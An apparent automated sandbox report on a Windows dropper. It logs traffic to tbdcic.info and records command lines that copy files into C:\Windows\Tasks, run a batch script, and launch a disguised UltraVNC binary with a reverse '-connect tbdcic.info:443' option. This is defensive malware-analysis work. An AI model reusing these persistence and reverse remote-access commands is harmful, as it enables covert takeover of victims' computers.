MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:29:29.248423100 CET	49781	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.248473883 CET	443	49781	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:29.248553038 CET	49781	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.248713017 CET	49781	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.248725891 CET	443	49781	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:29.248749971 CET	443	49781	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:29.376131058 CET	49782	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.376209974 CET	443	49782	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:29.376288891 CET	49782	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.376440048 CET	49782	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:29.376487970 CET	443	49782	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:29.376535892 CET	443	49782	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:40.513093948 CET	49819	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:40.513128996 CET	443	49819	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:40.513499975 CET	49819	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:40.513624907 CET	49819	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:29:40.513636112 CET	443	49819	194.190.152.201	192.168.2.6
Dec 23, 2024 13:29:40.513664961 CET	443	49819	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:02.893889904 CET	49875	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:02.893925905 CET	443	49875	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:02.894022942 CET	49875	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:02.894176006 CET	49875	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:02.894186020 CET	443	49875	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:02.894217968 CET	443	49875	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:42.298312902 CET	49955	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:42.298343897 CET	443	49955	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:42.298589945 CET	49955	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:42.298816919 CET	49955	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:30:42.298826933 CET	443	49955	194.190.152.201	192.168.2.6
Dec 23, 2024 13:30:42.298885107 CET	443	49955	194.190.152.201	192.168.2.6
Dec 23, 2024 13:31:32.958844900 CET	50042	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:31:32.958884001 CET	443	50042	194.190.152.201	192.168.2.6
Dec 23, 2024 13:31:32.958982944 CET	50042	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:31:32.959064960 CET	50042	443	192.168.2.6	194.190.152.201
Dec 23, 2024 13:31:32.959070921 CET	443	50042	194.190.152.201	192.168.2.6
Dec 23, 2024 13:31:32.959191084 CET	443	50042	194.190.152.201	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:29:22.120979071 CET	56549	53	192.168.2.6	1.1.1.1
Dec 23, 2024 13:29:28.993563890 CET	53999	53	192.168.2.6	1.1.1.1
Dec 23, 2024 13:29:29.131325006 CET	53	53999	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 13:29:22.120979071 CET	192.168.2.6	1.1.1.1	0xf4cb	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:28.993563890 CET	192.168.2.6	1.1.1.1	0xe7b9	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 13:29:22.259048939 CET	1.1.1.1	192.168.2.6	0xf4cb	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:29:29.131325006 CET	1.1.1.1	192.168.2.6	0xe7b9	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:59.090620041 CET	1.1.1.1	192.168.2.6	0x938c	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:59.090620041 CET	1.1.1.1	192.168.2.6	0x938c	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:38.652782917 CET	1.1.1.1	192.168.2.6	0x715e	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:30:38.652782917 CET	1.1.1.1	192.168.2.6	0x715e	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:38.652782917 CET	1.1.1.1	192.168.2.6	0x715e	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:29:08
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Olz7TmvkEW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Olz7TmvkEW.exe"
Imagebase:	0x400000
File size:	1'641'047 bytes
MD5 hash:	539B0FC32045DE3013D00850827654AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:29:09
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:29:11
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Imagebase:	0x7ff651090000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	07:29:11
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:29:12
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im sync_browser.exe
Imagebase:	0xd70000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:29:12
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	07:29:12
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:29:13
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	07:29:15
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:29:17
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:29:20
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe
Imagebase:	0x7ff7d5930000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	07:29:20
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 8
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:29:28
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
Imagebase:	0x7ff7d5930000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:29:28
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:29:30
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 4
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:29:34
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0x820000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.6%
Total number of Nodes:	1618
Total number of Limit Nodes:	14

Executed Functions

Function 00405721 Relevance: 231.1, APIs: 93, Strings: 38, Instructions: 1811keyboardwindowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734

Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2

Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434

_wtol.MSVCRT ref: 00405825
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
_wtol.MSVCRT ref: 00405A25
??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
wsprintfW.USER32 ref: 00405D2A

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E

Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D

_wtol.MSVCRT ref: 00405F6B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
CoInitialize.OLE32(00000000), ref: 004062F2
_wtol.MSVCRT ref: 00406338
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
GetKeyState.USER32(00000010), ref: 004063BE
??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
_wtol.MSVCRT ref: 0040686C
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53

Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77

Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF

??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253

Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50

Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64

??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
